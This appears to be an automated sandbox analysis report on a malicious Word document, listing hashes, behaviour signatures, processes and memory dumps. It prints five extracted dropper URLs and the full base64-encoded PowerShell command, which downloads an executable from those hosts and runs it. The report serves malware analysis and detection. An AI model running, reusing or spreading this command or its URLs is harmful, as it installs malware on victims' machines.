Analysis

  • max time kernel
    112s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-07-2022 04:36

General

  • Target

    2899b6841f0906141c249b1557b39b7989ee98c7172bdbf5e366c8f2e8a8fb89.doc

  • Size

    127KB

  • MD5

    5b6000ef0f25e0bc46f3f31204f4700b

  • SHA1

    ac84b02f593cd905232b82b4629c7af6be31f577

  • SHA256

    2899b6841f0906141c249b1557b39b7989ee98c7172bdbf5e366c8f2e8a8fb89

  • SHA512

    266c49669b211649cfe122541488acc5ebfeac535cae101bb81e075530e5212112c08fb0632b5fae93926641cae9b575c58970d5d8a7e969312c9cf7320996a3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://securityone-eg.com/wp-content/c6zvhffmx_6skfqch2lf-4721/

exe.dropper

http://randewoo.ir/profiles/50sq_qqdxeeln-04257/

exe.dropper

https://www.aseanlegaltech.com/wp-includes/lFhhBfMMLK/

exe.dropper

https://cybermagicindia.com/images/ur82i_90jm6p-55532/

exe.dropper

http://3rdperson.ml/wp-includes/eEEGYADPv/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2899b6841f0906141c249b1557b39b7989ee98c7172bdbf5e366c8f2e8a8fb89.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:5036
    • C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe
      PowErsHell -enC JABEADcANQAwAF8AMQA9ACcAVwA2ADkAMgBfADAAJwA7ACQAbwA2ADEAXwA0ADYAOQAgAD0AIAAnADcANwAyACcAOwAkAEYANwA5ADcAMgA3ADIANwA9ACcAcABfAF8AMwAxADMANAA0ACcAOwAkAEEAOAAxADQAMgA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvADYAMQBfADQANgA5ACsAJwAuAGUAeABlACcAOwAkAFAAMQA3ADQAMgA4ADEAPQAnAHAANwAzADIANwA1ACcAOwAkAHoANgAzADUAOAAwADIAPQAmACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYABjAGAAbABJAGAAZQBOAHQAOwAkAHMAMwAyADEAXwAzADUAMAA9ACcAaAB0AHQAcAA6AC8ALwBzAGUAYwB1AHIAaQB0AHkAbwBuAGUALQBlAGcALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBjADYAegB2AGgAZgBmAG0AeABfADYAcwBrAGYAcQBjAGgAMgBsAGYALQA0ADcAMgAxAC8AQABoAHQAdABwADoALwAvAHIAYQBuAGQAZQB3AG8AbwAuAGkAcgAvAHAAcgBvAGYAaQBsAGUAcwAvADUAMABzAHEAXwBxAHEAZAB4AGUAZQBsAG4ALQAwADQAMgA1ADcALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGEAcwBlAGEAbgBsAGUAZwBhAGwAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbABGAGgAaABCAGYATQBNAEwASwAvAEAAaAB0AHQAcABzADoALwAvAGMAeQBiAGUAcgBtAGEAZwBpAGMAaQBuAGQAaQBhAC4AYwBvAG0ALwBpAG0AYQBnAGUAcwAvAHUAcgA4ADIAaQBfADkAMABqAG0ANgBwAC0ANQA1ADUAMwAyAC8AQABoAHQAdABwADoALwAvADMAcgBkAHAAZQByAHMAbwBuAC4AbQBsAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZQBFAEUARwBZAEEARABQAHYALwAnAC4AUwBwAGwASQB0ACgAJwBAACcAKQA7ACQAZABfAF8ANAA0ADYAMgBfAD0AJwBOADgAXwA4ADcAOAA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABrADAAMAA2ADQANwAgAGkAbgAgACQAcwAzADIAMQBfADMANQAwACkAewB0AHIAeQB7ACQAegA2ADMANQA4ADAAMgAuAEQATwBXAE4ATABvAGEAZABmAGkATABFACgAJABrADAAMAA2ADQANwAsACAAJABBADgAMQA0ADIANgApADsAJAB6ADUANQA2ADcAMgA9ACcAUwA2ADAANAAwADAANQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEEAOAAxADQAMgA2ACkALgBsAGUATgBnAFQAaAAgAC0AZwBlACAAMwA0ADkAOAA5ACkAIAB7ACYAKAAnAEkAJwArACcAbgAnACsAJwB2AG8AawBlAC0ASQB0AGUAbQAnACkAIAAkAEEAOAAxADQAMgA2ADsAJABGADEANgA2ADUAXwA9ACcAUwAzADIAXwA2ADgAMwA0ACcAOwBiAHIAZQBhAGsAOwAkAEcANgA1ADMAMABfADkAPQAnAEcANQAwADYAXwAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFYANwA2AF8ANgAzADkAPQAnAGEANQBfADMAMgA3ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5052

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2084-140-0x000002988EB20000-0x000002988EB24000-memory.dmp
      Filesize

      16KB

    • memory/2084-136-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-132-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-135-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-149-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-137-0x00007FFE0D860000-0x00007FFE0D870000-memory.dmp
      Filesize

      64KB

    • memory/2084-138-0x00007FFE0D860000-0x00007FFE0D870000-memory.dmp
      Filesize

      64KB

    • memory/2084-148-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-134-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-133-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-147-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/2084-146-0x00007FFE0FF90000-0x00007FFE0FFA0000-memory.dmp
      Filesize

      64KB

    • memory/5036-139-0x0000000000000000-mapping.dmp
    • memory/5052-144-0x00007FFE24D70000-0x00007FFE25831000-memory.dmp
      Filesize

      10.8MB

    • memory/5052-143-0x00007FFE24D70000-0x00007FFE25831000-memory.dmp
      Filesize

      10.8MB

    • memory/5052-142-0x00007FFE24D70000-0x00007FFE25831000-memory.dmp
      Filesize

      10.8MB

    • memory/5052-141-0x0000014245810000-0x0000014245832000-memory.dmp
      Filesize

      136KB